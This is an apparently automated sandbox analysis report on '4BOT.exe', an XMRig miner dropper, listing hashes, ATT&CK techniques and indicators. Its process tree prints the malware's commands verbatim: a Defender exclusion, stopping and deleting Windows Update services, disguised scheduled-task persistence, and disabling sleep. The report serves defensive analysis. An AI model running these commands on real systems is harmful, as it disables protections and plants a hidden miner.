xmrig | a64f74746190a2da55afe7b5b6a95e826c6aa70afda165b276489d1738783631

Resubmissions

25/04/2023, 13:06

230425-qb6mwacc7x 10

25/04/2023, 12:56

230425-p6tq5aad89 10

25/04/2023, 12:54

230425-p5dzaacc5s 10

Analysis

max time kernel
150s
max time network
151s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
25/04/2023, 12:56

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

4BOT.exe
Size

4.1MB
MD5

6ce29e0f74ff2df208a44a3324472cb5
SHA1

5653ceb3aa850ac17c862d910c9c0d3aa2d15bac
SHA256

5eeb67c1b9e0fac082836a13b7c60157404ea376b0c910a5fbfb98df7f99f26e
SHA512

b38d65de4b738044128fc40ce68aa9211805ab25bf6585fd21a7fc2c156f02fa14457dba618587a1ad4fee44e0ca9f51fa52ac7291656129d16d1c693222932a
SSDEEP

98304:CGaVlKvrfPSEA4zeA9G2Z3IopMW9vSkkslgMNBKQxLOO705M:Y7KDfPpA4h/vl2slgMNQxO702

Score

10^/10

xmrig evasion miner trojan upx

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4BOT.exe

XMRig Miner payload 13 IoCs

miner

resource	yara_rule
behavioral2/memory/2100-727-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	xmrig
behavioral2/memory/2100-733-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	xmrig
behavioral2/memory/2100-734-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	xmrig
behavioral2/memory/2100-737-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	xmrig
behavioral2/memory/2100-740-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	xmrig
behavioral2/memory/2100-744-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	xmrig
behavioral2/memory/2100-748-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	xmrig
behavioral2/memory/2100-751-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	xmrig
behavioral2/memory/2100-754-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	xmrig
behavioral2/memory/2100-757-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	xmrig
behavioral2/memory/2100-760-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	xmrig
behavioral2/memory/2100-765-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	xmrig
behavioral2/memory/2100-770-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	xmrig

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe
File created	C:\Windows\system32\drivers\etc\hosts	fbot.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4BOT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4BOT.exe

Executes dropped EXE 2 IoCs

pid	Process
2932	fbot.exe
5020	updater.exe

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2100-727-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	upx
behavioral2/memory/2100-733-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	upx
behavioral2/memory/2100-734-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	upx
behavioral2/memory/2100-737-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	upx
behavioral2/memory/2100-740-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	upx
behavioral2/memory/2100-744-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	upx
behavioral2/memory/2100-748-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	upx
behavioral2/memory/2100-751-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	upx
behavioral2/memory/2100-754-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	upx
behavioral2/memory/2100-757-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	upx
behavioral2/memory/2100-760-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	upx
behavioral2/memory/2100-765-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	upx
behavioral2/memory/2100-770-0x00007FF63AB20000-0x00007FF63B314000-memory.dmp	upx

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4BOT.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
3168	4BOT.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 5020 set thread context of 1512	5020	updater.exe	117
PID 5020 set thread context of 2100	5020	updater.exe	123

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Chrome\updater.exe	fbot.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4428	sc.exe
5064	sc.exe
2568	sc.exe
2960	sc.exe
2708	sc.exe
4404	sc.exe
4460	sc.exe
4356	sc.exe
4448	sc.exe
5084	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe
3168	4BOT.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
632	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3168	4BOT.exe
Token: SeDebugPrivilege	3476	powershell.exe
Token: SeIncreaseQuotaPrivilege	3476	powershell.exe
Token: SeSecurityPrivilege	3476	powershell.exe
Token: SeTakeOwnershipPrivilege	3476	powershell.exe
Token: SeLoadDriverPrivilege	3476	powershell.exe
Token: SeSystemProfilePrivilege	3476	powershell.exe
Token: SeSystemtimePrivilege	3476	powershell.exe
Token: SeProfSingleProcessPrivilege	3476	powershell.exe
Token: SeIncBasePriorityPrivilege	3476	powershell.exe
Token: SeCreatePagefilePrivilege	3476	powershell.exe
Token: SeBackupPrivilege	3476	powershell.exe
Token: SeRestorePrivilege	3476	powershell.exe
Token: SeShutdownPrivilege	3476	powershell.exe
Token: SeDebugPrivilege	3476	powershell.exe
Token: SeSystemEnvironmentPrivilege	3476	powershell.exe
Token: SeRemoteShutdownPrivilege	3476	powershell.exe
Token: SeUndockPrivilege	3476	powershell.exe
Token: SeManageVolumePrivilege	3476	powershell.exe
Token: 33	3476	powershell.exe
Token: 34	3476	powershell.exe
Token: 35	3476	powershell.exe
Token: 36	3476	powershell.exe
Token: SeShutdownPrivilege	2704	powercfg.exe
Token: SeCreatePagefilePrivilege	2704	powercfg.exe
Token: SeShutdownPrivilege	4992	powercfg.exe
Token: SeCreatePagefilePrivilege	4992	powercfg.exe
Token: SeDebugPrivilege	1328	powershell.exe
Token: SeShutdownPrivilege	4380	powercfg.exe
Token: SeCreatePagefilePrivilege	4380	powercfg.exe
Token: SeShutdownPrivilege	3196	powercfg.exe
Token: SeCreatePagefilePrivilege	3196	powercfg.exe
Token: SeIncreaseQuotaPrivilege	1328	powershell.exe
Token: SeSecurityPrivilege	1328	powershell.exe
Token: SeTakeOwnershipPrivilege	1328	powershell.exe
Token: SeLoadDriverPrivilege	1328	powershell.exe
Token: SeSystemProfilePrivilege	1328	powershell.exe
Token: SeSystemtimePrivilege	1328	powershell.exe
Token: SeProfSingleProcessPrivilege	1328	powershell.exe
Token: SeIncBasePriorityPrivilege	1328	powershell.exe
Token: SeCreatePagefilePrivilege	1328	powershell.exe
Token: SeBackupPrivilege	1328	powershell.exe
Token: SeRestorePrivilege	1328	powershell.exe
Token: SeShutdownPrivilege	1328	powershell.exe
Token: SeDebugPrivilege	1328	powershell.exe
Token: SeSystemEnvironmentPrivilege	1328	powershell.exe
Token: SeRemoteShutdownPrivilege	1328	powershell.exe
Token: SeUndockPrivilege	1328	powershell.exe
Token: SeManageVolumePrivilege	1328	powershell.exe
Token: 33	1328	powershell.exe
Token: 34	1328	powershell.exe
Token: 35	1328	powershell.exe
Token: 36	1328	powershell.exe
Token: SeIncreaseQuotaPrivilege	1328	powershell.exe
Token: SeSecurityPrivilege	1328	powershell.exe
Token: SeTakeOwnershipPrivilege	1328	powershell.exe
Token: SeLoadDriverPrivilege	1328	powershell.exe
Token: SeSystemProfilePrivilege	1328	powershell.exe
Token: SeSystemtimePrivilege	1328	powershell.exe
Token: SeProfSingleProcessPrivilege	1328	powershell.exe
Token: SeIncBasePriorityPrivilege	1328	powershell.exe
Token: SeCreatePagefilePrivilege	1328	powershell.exe
Token: SeBackupPrivilege	1328	powershell.exe
Token: SeRestorePrivilege	1328	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3168 wrote to memory of 2932	3168	4BOT.exe	66
PID 3168 wrote to memory of 2932	3168	4BOT.exe	66
PID 2932 wrote to memory of 3476	2932	fbot.exe	67
PID 2932 wrote to memory of 3476	2932	fbot.exe	67
PID 2932 wrote to memory of 2712	2932	fbot.exe	70
PID 2932 wrote to memory of 2712	2932	fbot.exe	70
PID 2932 wrote to memory of 5072	2932	fbot.exe	74
PID 2932 wrote to memory of 5072	2932	fbot.exe	74
PID 2932 wrote to memory of 1328	2932	fbot.exe	73
PID 2932 wrote to memory of 1328	2932	fbot.exe	73
PID 5072 wrote to memory of 2704	5072	cmd.exe	77
PID 5072 wrote to memory of 2704	5072	cmd.exe	77
PID 2712 wrote to memory of 2960	2712	cmd.exe	76
PID 2712 wrote to memory of 2960	2712	cmd.exe	76
PID 5072 wrote to memory of 4992	5072	cmd.exe	78
PID 5072 wrote to memory of 4992	5072	cmd.exe	78
PID 2712 wrote to memory of 4428	2712	cmd.exe	79
PID 2712 wrote to memory of 4428	2712	cmd.exe	79
PID 5072 wrote to memory of 4380	5072	cmd.exe	80
PID 5072 wrote to memory of 4380	5072	cmd.exe	80
PID 2712 wrote to memory of 2708	2712	cmd.exe	81
PID 2712 wrote to memory of 2708	2712	cmd.exe	81
PID 5072 wrote to memory of 3196	5072	cmd.exe	82
PID 5072 wrote to memory of 3196	5072	cmd.exe	82
PID 2712 wrote to memory of 4404	2712	cmd.exe	83
PID 2712 wrote to memory of 4404	2712	cmd.exe	83
PID 2712 wrote to memory of 4460	2712	cmd.exe	84
PID 2712 wrote to memory of 4460	2712	cmd.exe	84
PID 2712 wrote to memory of 3904	2712	cmd.exe	85
PID 2712 wrote to memory of 3904	2712	cmd.exe	85
PID 2712 wrote to memory of 2568	2712	cmd.exe	86
PID 2712 wrote to memory of 2568	2712	cmd.exe	86
PID 2712 wrote to memory of 4304	2712	cmd.exe	87
PID 2712 wrote to memory of 4304	2712	cmd.exe	87
PID 2712 wrote to memory of 4264	2712	cmd.exe	88
PID 2712 wrote to memory of 4264	2712	cmd.exe	88
PID 2712 wrote to memory of 4316	2712	cmd.exe	89
PID 2712 wrote to memory of 4316	2712	cmd.exe	89
PID 2932 wrote to memory of 3264	2932	fbot.exe	91
PID 2932 wrote to memory of 3264	2932	fbot.exe	91
PID 3264 wrote to memory of 872	3264	powershell.exe	93
PID 3264 wrote to memory of 872	3264	powershell.exe	93
PID 5020 wrote to memory of 1712	5020	updater.exe	95
PID 5020 wrote to memory of 1712	5020	updater.exe	95
PID 5020 wrote to memory of 5056	5020	updater.exe	97
PID 5020 wrote to memory of 5056	5020	updater.exe	97
PID 5020 wrote to memory of 944	5020	updater.exe	98
PID 5020 wrote to memory of 944	5020	updater.exe	98
PID 5020 wrote to memory of 4844	5020	updater.exe	100
PID 5020 wrote to memory of 4844	5020	updater.exe	100
PID 5056 wrote to memory of 5064	5056	cmd.exe	103
PID 5056 wrote to memory of 5064	5056	cmd.exe	103
PID 944 wrote to memory of 2820	944	cmd.exe	104
PID 944 wrote to memory of 2820	944	cmd.exe	104
PID 944 wrote to memory of 4392	944	cmd.exe	105
PID 944 wrote to memory of 4392	944	cmd.exe	105
PID 5056 wrote to memory of 4356	5056	cmd.exe	106
PID 5056 wrote to memory of 4356	5056	cmd.exe	106
PID 944 wrote to memory of 512	944	cmd.exe	107
PID 944 wrote to memory of 512	944	cmd.exe	107
PID 5056 wrote to memory of 4448	5056	cmd.exe	108
PID 5056 wrote to memory of 4448	5056	cmd.exe	108
PID 944 wrote to memory of 2576	944	cmd.exe	109
PID 944 wrote to memory of 2576	944	cmd.exe	109

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\4BOT.exe
"C:\Users\Admin\AppData\Local\Temp\4BOT.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3168
- C:\Users\Admin\AppData\Local\MySQL Community\fbot.exe
  "C:\Users\Admin\AppData\Local\MySQL Community\fbot.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:2932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3476
- - C:\Windows\System32\cmd.exe
    cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2712
  - - C:\Windows\System32\sc.exe
      sc stop UsoSvc
      4⤵
      Launches sc.exe
      PID:2960
  - - C:\Windows\System32\sc.exe
      sc stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:4428
  - - C:\Windows\System32\sc.exe
      sc stop wuauserv
      4⤵
      Launches sc.exe
      PID:2708
  - - C:\Windows\System32\sc.exe
      sc stop bits
      4⤵
      Launches sc.exe
      PID:4404
  - - C:\Windows\System32\sc.exe
      sc stop dosvc
      4⤵
      Launches sc.exe
      PID:4460
  - - C:\Windows\System32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
      4⤵
      PID:3904
  - - C:\Windows\System32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
      4⤵
      PID:2568
  - - C:\Windows\System32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
      4⤵
      Modifies security service
      PID:4304
  - - C:\Windows\System32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
      4⤵
      PID:4264
  - - C:\Windows\System32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      PID:4316
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell <#heofpouz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1328
- - C:\Windows\System32\cmd.exe
    cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5072
  - - C:\Windows\System32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2704
  - - C:\Windows\System32\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4992
  - - C:\Windows\System32\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4380
  - - C:\Windows\System32\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3196
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell <#pccvbn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3264
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
      4⤵
      PID:872

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:5020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:1712
- C:\Windows\system32\cmd.exe
